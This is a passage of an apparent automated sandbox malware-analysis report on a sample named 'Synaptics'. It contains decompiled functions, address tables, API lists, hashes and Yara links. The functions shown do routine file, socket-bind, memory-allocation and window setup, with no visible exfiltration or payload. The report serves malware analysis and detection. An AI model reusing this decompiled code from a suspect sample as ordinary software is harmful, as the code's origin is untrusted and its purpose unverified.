                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000), ref: 00409A1F
                                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2659516521-0
                                                                                                                                                                                                                            • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F118 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0043F118(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0043B6EC(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E0043C1FC(_t50, _t67); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043F084(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00441A08(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E00441704(_t50);
						_push(_t32);
						L00407540();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E0043C1FC(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0043AAC0(_t50,  &_v28,  &_v20);
					_t21 = E0043EFF0(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E004519E0(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00441704(__eax);
						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
							_t47 =  *0x49bce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x49bce0; // 0x0
								E0043C130(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}



















                                                                                                                                                                                                                            0x0043f11e
                                                                                                                                                                                                                            0x0043f120
                                                                                                                                                                                                                            0x0043f122
                                                                                                                                                                                                                            0x0043f124
                                                                                                                                                                                                                            0x0043f129
                                                                                                                                                                                                                            0x0043f148
                                                                                                                                                                                                                            0x0043f14b
                                                                                                                                                                                                                            0x0043f228
                                                                                                                                                                                                                            0x0043f22f
                                                                                                                                                                                                                            0x0043f27a
                                                                                                                                                                                                                            0x0043f27a
                                                                                                                                                                                                                            0x0043f27a
                                                                                                                                                                                                                            0x0043f26b
                                                                                                                                                                                                                            0x0043f26f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f26f
                                                                                                                                                                                                                            0x0043f159
                                                                                                                                                                                                                            0x0043f1f2
                                                                                                                                                                                                                            0x0043f1f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1ff
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f203
                                                                                                                                                                                                                            0x0043f20a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f20f
                                                                                                                                                                                                                            0x0043f213
                                                                                                                                                                                                                            0x0043f216
                                                                                                                                                                                                                            0x0043f219
                                                                                                                                                                                                                            0x0043f21e
                                                                                                                                                                                                                            0x0043f21f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f21f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f15f
                                                                                                                                                                                                                            0x0043f12b
                                                                                                                                                                                                                            0x0043f1a1
                                                                                                                                                                                                                            0x0043f1aa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1b9
                                                                                                                                                                                                                            0x0043f1c8
                                                                                                                                                                                                                            0x0043f1d5
                                                                                                                                                                                                                            0x0043f1dc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1e2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f1e2
                                                                                                                                                                                                                            0x0043f12d
                                                                                                                                                                                                                            0x0043f130
                                                                                                                                                                                                                            0x0043f16b
                                                                                                                                                                                                                            0x0043f16f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f17b
                                                                                                                                                                                                                            0x0043f183
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f189
                                                                                                                                                                                                                            0x0043f132
                                                                                                                                                                                                                            0x0043f133
                                                                                                                                                                                                                            0x0043f192
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f135
                                                                                                                                                                                                                            0x0043f138
                                                                                                                                                                                                                            0x0043f235
                                                                                                                                                                                                                            0x0043f243
                                                                                                                                                                                                                            0x0043f24e
                                                                                                                                                                                                                            0x0043f256
                                                                                                                                                                                                                            0x0043f261
                                                                                                                                                                                                                            0x0043f266
                                                                                                                                                                                                                            0x0043f266
                                                                                                                                                                                                                            0x0043f256
                                                                                                                                                                                                                            0x0043f243
                                                                                                                                                                                                                            0x0043f138

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Capture
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1145282425-3916222277
                                                                                                                                                                                                                            • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047C7BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E0047C7BC(void* __eax, char __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t20;
				intOrPtr* _t24;
				void* _t26;
				void* _t28;
				void* _t32;

				_v8 = __ecx;
				_t32 = __edx;
				_t28 = __eax;
				_t33 = _a8;
				_v24 = _v8;
				if(E00404C80(_a8) != 0) {
					_v28 = E0047C3AC(_t28, _t28, _t33);
					_v20 = _v28;
				} else {
					_v20 = 0;
				}
				_t20 =  *0x49d984; // 0x49ece4
				_v22 =  *((intOrPtr*)( *_t20))(_a4);
				_t24 =  *0x49d928; // 0x49ecc4
				_t26 =  *((intOrPtr*)( *_t24))(_t32,  &_v24, 0x10); // executed
				return _t26;
			}















                                                                                                                                                                                                                            0x0047c7c5
                                                                                                                                                                                                                            0x0047c7c8
                                                                                                                                                                                                                            0x0047c7ca
                                                                                                                                                                                                                            0x0047c7cc
                                                                                                                                                                                                                            0x0047c7d3
                                                                                                                                                                                                                            0x0047c7e0
                                                                                                                                                                                                                            0x0047c7f2
                                                                                                                                                                                                                            0x0047c7f8
                                                                                                                                                                                                                            0x0047c7e2
                                                                                                                                                                                                                            0x0047c7e4
                                                                                                                                                                                                                            0x0047c7e4
                                                                                                                                                                                                                            0x0047c800
                                                                                                                                                                                                                            0x0047c809
                                                                                                                                                                                                                            0x0047c814
                                                                                                                                                                                                                            0x0047c81b
                                                                                                                                                                                                                            0x0047c823

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • bind.WS2_32(?,?,00000010), ref: 0047C81B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: bind
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 1187836755-1966777607
                                                                                                                                                                                                                            • Opcode ID: 338424bfcf9b443325b13217d0ddfa32753095248967005ccd7384656c09734e
                                                                                                                                                                                                                            • Instruction ID: d8dcd3f30659037859b9746cd7a4f13db28008142928148337f91f606f628de3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 338424bfcf9b443325b13217d0ddfa32753095248967005ccd7384656c09734e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0601EC75A101099F8740DFADD8819EEB7F8EF98610B10403AED18E3310E7709E058BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00422BCC Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x49e88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x49e888; // 0x2120000
					 *_t35 = _t15;
					E004029DC(0x49b5c8, 2, _t35 + 4);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t35 + 4);
						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
						 *0x49e88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x49e888 = _t35;
				}
				_t25 =  *0x49e88c;
				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x49e88c;
			}








                                                                                                                                                                                                                            0x00422bda
                                                                                                                                                                                                                            0x00422bea
                                                                                                                                                                                                                            0x00422bef
                                                                                                                                                                                                                            0x00422bf1
                                                                                                                                                                                                                            0x00422bf6
                                                                                                                                                                                                                            0x00422c05
                                                                                                                                                                                                                            0x00422c0f
                                                                                                                                                                                                                            0x00422c17
                                                                                                                                                                                                                            0x00422c1a
                                                                                                                                                                                                                            0x00422c1a
                                                                                                                                                                                                                            0x00422c1d
                                                                                                                                                                                                                            0x00422c1d
                                                                                                                                                                                                                            0x00422c2a
                                                                                                                                                                                                                            0x00422c2f
                                                                                                                                                                                                                            0x00422c32
                                                                                                                                                                                                                            0x00422c34
                                                                                                                                                                                                                            0x00422c3b
                                                                                                                                                                                                                            0x00422c42
                                                                                                                                                                                                                            0x00422c42
                                                                                                                                                                                                                            0x00422c4a
                                                                                                                                                                                                                            0x00422c4f
                                                                                                                                                                                                                            0x00422c54
                                                                                                                                                                                                                            0x00422c5a
                                                                                                                                                                                                                            0x00422c61

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0042F4BC,00000000,?,00422D23,?,00000001,00000000,00400000,00000000,00000000,00000000), ref: 00422BEA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID: x,B
                                                                                                                                                                                                                            • API String ID: 4275171209-71347176
                                                                                                                                                                                                                            • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409B1C Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B1C(void* __eax, WORD* __ecx, signed int __edx) {
				void* _t8;
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t8 = FindFirstFileA(E00404E80(__eax), __ecx + 0x18); // executed
				_t21 = _t8;
				 *(_t15 + 0x14) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00409AB8(_t15);
					if(_t22 != 0) {
						E00409B90(_t15);
					}
				}
				return _t22;
			}







                                                                                                                                                                                                                            0x00409b1f
                                                                                                                                                                                                                            0x00409b28
                                                                                                                                                                                                                            0x00409b37
                                                                                                                                                                                                                            0x00409b3c
                                                                                                                                                                                                                            0x00409b3e
                                                                                                                                                                                                                            0x00409b44
                                                                                                                                                                                                                            0x00409b61
                                                                                                                                                                                                                            0x00409b46
                                                                                                                                                                                                                            0x00409b4d
                                                                                                                                                                                                                            0x00409b51
                                                                                                                                                                                                                            0x00409b55
                                                                                                                                                                                                                            0x00409b55
                                                                                                                                                                                                                            0x00409b51
                                                                                                                                                                                                                            0x00409b68

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C), ref: 00409B37
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C), ref: 00409B5C
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                              • Part of subcall function 00409B90: FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE), ref: 00409B9C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 976985129-0
                                                                                                                                                                                                                            • Opcode ID: 3e75097ecda1ea3253092f31a1e70b9f4d0e684efd658f6c4eb41b883134c2c9
                                                                                                                                                                                                                            • Instruction ID: 79fd7835e2b2924360e3ee9b5121bf30e16e58b6cc0e4d1406ffac342d6b08ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e75097ecda1ea3253092f31a1e70b9f4d0e684efd658f6c4eb41b883134c2c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E03962F0122007C7156A7E688159A65DC6A85778349037FF914FB3C7D63CEC0643E9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004598AC Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E004598AC(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00407540(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                                                                                                                                                                            0x004598b8
                                                                                                                                                                                                                            0x004598c2
                                                                                                                                                                                                                            0x004598cb
                                                                                                                                                                                                                            0x004598d2
                                                                                                                                                                                                                            0x004598d5
                                                                                                                                                                                                                            0x004598d6
                                                                                                                                                                                                                            0x004598e1
                                                                                                                                                                                                                            0x004598e5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4255912815-0
                                                                                                                                                                                                                            • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                                                            • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004593B4 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132windowregistryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 42%
                                                                                                                                                                                                                            			E004593B4(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x459555);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x45955c);
					return E004049C0( &_v48);
				}
				_t22 =  *0x49dc84; // 0x49e04c
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00422BCC(E00459934, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x49bf54 = L00407540;
				_t26 =  *0x49bf74; // 0x45909c
				_t27 =  *0x49e668; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x49e668; // 0x400000
					 *0x49bf60 = _t62;
					_t88 = RegisterClassA(0x49bf50);
					if(_t88 == 0) {
						_t64 =  *0x49d7fc; // 0x422f20
						E00406A70(_t64,  &_v48);
						E0040D144(_v48, 1);
						E00404378();
					}
				}
				_t29 =  *0x49d970; // 0x49e900
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x49d970; // 0x49e900
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x49e668; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x96000045
				_t39 = E00404E80( *_t7);
				_t40 =  *0x49bf74; // 0x45909c, executed
				_t41 = E00407AE4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45150c
				E004049C0(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x49da40; // 0x49eb1c
				if( *_t47 != 0) {
					_t55 = E0045A038(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0045A038(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x49da40; // 0x49eb1c
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                                                                                                                                                                                                            0x004593bd
                                                                                                                                                                                                                            0x004593c0
                                                                                                                                                                                                                            0x004593c4
                                                                                                                                                                                                                            0x004593c5
                                                                                                                                                                                                                            0x004593ca
                                                                                                                                                                                                                            0x004593cd
                                                                                                                                                                                                                            0x004593d7
                                                                                                                                                                                                                            0x0045953f
                                                                                                                                                                                                                            0x00459541
                                                                                                                                                                                                                            0x00459544
                                                                                                                                                                                                                            0x00459547
                                                                                                                                                                                                                            0x00459554
                                                                                                                                                                                                                            0x00459554
                                                                                                                                                                                                                            0x004593dd
                                                                                                                                                                                                                            0x004593e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004593f1
                                                                                                                                                                                                                            0x004593f6
                                                                                                                                                                                                                            0x004593fe
                                                                                                                                                                                                                            0x00459407
                                                                                                                                                                                                                            0x0045940d
                                                                                                                                                                                                                            0x0045941a
                                                                                                                                                                                                                            0x0045941c
                                                                                                                                                                                                                            0x00459421
                                                                                                                                                                                                                            0x00459430
                                                                                                                                                                                                                            0x00459433
                                                                                                                                                                                                                            0x00459438
                                                                                                                                                                                                                            0x0045943d
                                                                                                                                                                                                                            0x0045944c
                                                                                                                                                                                                                            0x00459451
                                                                                                                                                                                                                            0x00459451
                                                                                                                                                                                                                            0x00459433
                                                                                                                                                                                                                            0x00459458
                                                                                                                                                                                                                            0x00459461
                                                                                                                                                                                                                            0x00459463
                                                                                                                                                                                                                            0x00459465
                                                                                                                                                                                                                            0x00459465
                                                                                                                                                                                                                            0x0045946b
                                                                                                                                                                                                                            0x00459474
                                                                                                                                                                                                                            0x00459476
                                                                                                                                                                                                                            0x00459478
                                                                                                                                                                                                                            0x00459478
                                                                                                                                                                                                                            0x0045947b
                                                                                                                                                                                                                            0x0045947c
                                                                                                                                                                                                                            0x0045947e
